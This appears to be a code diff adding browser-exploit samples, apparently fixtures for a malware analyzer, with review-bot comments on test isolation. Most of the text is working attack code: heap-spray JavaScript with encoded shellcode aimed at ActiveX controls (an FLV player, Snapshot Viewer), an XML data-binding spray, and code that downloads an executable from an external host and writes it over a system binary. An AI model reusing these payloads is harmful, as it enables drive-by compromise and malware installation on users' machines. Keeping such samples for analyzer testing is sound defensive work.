+ tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );
+ }catch(e){}
+ }
+
+ function getSpraySlide(spraySlide, spraySlideSize)
+ {
+ while (spraySlide.length*2<spraySlideSize)
+ {
+ spraySlide += spraySlide;
+ }
+ spraySlide = spraySlide.substring(0,spraySlideSize/2);
+ return spraySlide;
+ }
+
+</SCRIPT>
+
+</BODY>
+</HTML>
+
+
@@ -0,0 +1,47 @@
+<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
+
+<SCRIPT language="JavaScript">
+var expires = new Date();
+expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
+var set_cookie = document.cookie.indexOf("3Ware=");
+if (set_cookie == -1){document.cookie = "3Ware=1;expires=" + expires.toGMTString();
+document.write('<object id="gl" classid="clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F"></object>');
+var helloworld2Address = 0x0c0c0c0c;
+var shellcode = unescape("%u10eb%u4b5b%uc933%ub966%u029b%u3480%ufe0b%ufae2%u05eb%uebe8%uffff%u17ff%ufcc4%ufefe%u94a1%ua7ce%u759a%u75ff%uf2be%u8e75%u53e2%u9675%u75f6%u9409%ua7f9%u2416%ufeff%u1cfe%ube07%uc67e%u8b3d%u7704%udab8%u9196%ufe90%u96fe%u8c8b%u9392%u94aa%ua7ff%uf875%u5e16%ufeff%u6bfe%u4a16%ufeff%u73fe%uc940%ufeff%ua9fe%u0196%ufefe%u01fe%ufaa8%u39fd%ufe39%u80a2%ud080%ube39%u9bfa%u9b86%ua9fe%ua801%ucdf6%uad25%ua9ad%ub873%uaec6%u01ad%ue2a8%u9294%u9096%u9a8a%uaa92%uff94%u75a7%u16f8%uffa7%ufefe%u1675%ubefd%u75c2%ue2b6%u8675%ufdd2%u9a03%ueb75%ufece%ufefe%u6c75%ufe56%ufefe%u0f96%udbb3%u962b%ub30f%u2bdb%u3796%ua0ac%u01ad%u6aca%ub871%u39d6%ud2b8%u7fb3%uefce%u4696%ufecc%u96fe%uce46%ufefe%u4696%ufed7%u75fe%u6afa%ub99e%uf9c7%ufc8a%u071c%u8077%u9fce%u4696%uffe1%u96fe%ueb46%ufeff%u4696%ufe0e%u75fe%u6afa%uc7b9%u8af9%u1cfc%u7707%uca80%ufe94%u9b96%ucd92%u96cc%u9b95%u908c%u94aa%ua7ff%uf875%u2c16%ufefe%u75fe%ufd26%uc2be%u3e7d%u75e6%u9686%u05fd%u817d%ufeee%u8b8a%ub175%ufdf2%u7f35%u90c7%u9a8a%u8b92%u759d%ufdd1%u7d15%ufe83%u8afe%u75a7%ufebb%uba73%ufce6%u37cd%u40f1%uc4ee%u8a28%u3ff6%uf937%u34fd%u15be%uc50f%ud6b0%ue48b%ud59e%ufdd1%uee91%uaaae%ufa94%ufa94%u01ab%ue6a8%u01a6%uce88%ubb71%u9ffe%ue315%ub0c5%u8bd2%u9ee6%ud1d5%u91fd%uaeee%u94aa%u94fa%uabfa%ua801%ua6e6%u8801%u71ca%ufebb%u7d9f%ufa3b%u5f15%u397d%u15ea%u757b%uea80%u94aa%u94fa%ua981%ua801%u39e6%u96f9%uf4f6%ucdfe%u763e%ufab9%u0275%uec94%u55a7%u031c%u3998%udaba%uffc2%u75ff%u7302%ueeb9%uaea9%uafaf%uafaf%uafaf%u73af%uc978%ufeff%uaefe%ua801%u7ff2%u763a%ufeff%u3cfe%ufede%ua801%u75ee%udaa8%ua5bf%ufdac%ufd1f%ufd1f%ufd1f%u7d1f%ufa12%uada4%u2475%u091c%u01ac%uaf1e%u75a8%uc28b%u8a75%u86d0%u0bfd%u75a8%ude88%u0bfd%u37cd%ubfb7%ufd53%ucd3b%uf125%uee40%u28c4%uf68a%u353f%ufdf9%ube24%u0f15%ue1c5%u198b%u75a0%udaa0%u23fd%u7598%ub5f2%ua075%ufde2%u7523%u75fa%u3bfd%ua055%u3da7%u3f16%u0103%ucc01%u6f8a%uc7f2%u831c%u877d%u18c7%u3766%u5842%u9d95%u2f77%u0eb1%u85b6%ue0c3%u9a5a%u7e11%u5128%ub364%uce7f%ufeef%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufef
e%u96fe%u8a8a%uc48e%ud1d1%u8989%ud089%ucd89%ud39d%u8c91%ud099%u919d%ud193%ucd89%ud09d%u869b%ufe9b");
+var hbshelloworld = 0x100000;
+var payLoadSize = shellcode.length * 2;
+var spraySlideSize = hbshelloworld - (payLoadSize+0x38);
+var spraySlide = unescape("%u0c0c%u0c0c");
+
+function getSpraySlide(spraySlide, spraySlideSize) {
+ while (spraySlide.length*2<spraySlideSize) {
+ spraySlide += spraySlide;
+ }
+ spraySlide = spraySlide.substring(0,spraySlideSize/2);
+ return spraySlide;
+}
+
+
+spraySlide = getSpraySlide(spraySlide,spraySlideSize);
+heapBlocks = (helloworld2Address - 0x100000)/hbshelloworld;
+memory = new Array();
+for (i=0;i<heapBlocks;i++) {
+ memory[i] = spraySlide + shellcode;
+}
+
+
+var size_buff = 1070;
+var x = unescape("%0c%0c%0c%0c");
+while (x.length<size_buff) x += x;
+gl.FlvPlayerUrl = x;
+}
+
+</SCRIPT>
+<script>
+if (set_cookie == -1){
+location.reload();
+}
+</script>
+
+
+//Sebug.net
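Review bot: This sample only takes its ActiveX path when `document.cookie` lacks `3Ware=`, after which it sets the cookie and the second script calls `location.reload()`, so what an analyzer records depends on cookie state left over from an earlier run. A test built on this fixture should start from an empty cookie jar and should bound the reload so the emulated page load terminates. The trailing `//Sebug.net` line sits outside any `<script>` element, so it is page text rather than a comment; `<!-- Sebug.net -->` would keep it out of the parsed DOM if byte-identical preservation of the sample is not a goal.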
@@ -0,0 +1,47 @@
+<SCRIPT language="javascript">
+ var p_url = "http://paksusic.cn/nuc/exe.php";
+function SS()
+{
+try{
+ret=new ActiveXObject("snpvw.Snapshot Viewer Control.1");
+var arbitrary_file = p_url;
+var dest = 'C:/Program Files/Outlook Express/wab.exe';
+document.write("<object classid='clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9' id='attack'></object>");
+attack.SnapshotPath = arbitrary_file;
+setTimeout('window.location = "ldap://127.0.0.1"',2000);
+attack.CompressedPath = dest;
+attack.PrintSnapshot(arbitrary_file,dest);
+}catch(e){}
+}
+function WML()
+{
+document.write('<div id="replace">x</div>');
+var srtkod = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" +
+"%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb" +
+"%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7" +
+"%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96" +
+"%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85" +
+"%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa" +
+"%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf" +
+"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc" +
+"%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba" +
+"%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec" +
+"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c" +
+"%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4" +
+"%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07" +
+"%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u702F%u6B61%u7573%u6973%u2E63%u6E63%u6E2F%u6375%u652F%u6578%u702E%u7068");
+var psrayt = unescape("%u0a0a%u0a0a");
+do {
+ psrayt += psrayt;
+} while(psrayt.length < 0xd0000);
+meray = new Array();
+for(i = 0; i < 100; i++)
+ meray[i] = psrayt + srtkod;
+xmlcode = "<XML ID=I><X><C><![CDATA[<image SRC=http://&#x0a0a;&#x0a0a;.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";
+tag = document.getElementById("replace");
+tag.innerHTML = xmlcode;
+}
+
+if (WML()||SS()) { }
+</script>
+
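Review bot: The `p_url` value on the second line of the hunk is a hard-coded external host, and `SS()` also schedules a navigation to an `ldap://` URL on 127.0.0.1 through a string `setTimeout`, so an analyzer that follows fetches while running this fixture will generate outbound traffic. Unit tests that load it should run with egress blocked or the resolver stubbed, and should assert that the URL is recorded rather than retrieved. `WML()` and `SS()` have no return statement, so in `if (WML()||SS()) { }` both run unless `WML()` throws; a short comment saying this is the sample's original dispatch would stop someone from "fixing" it.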
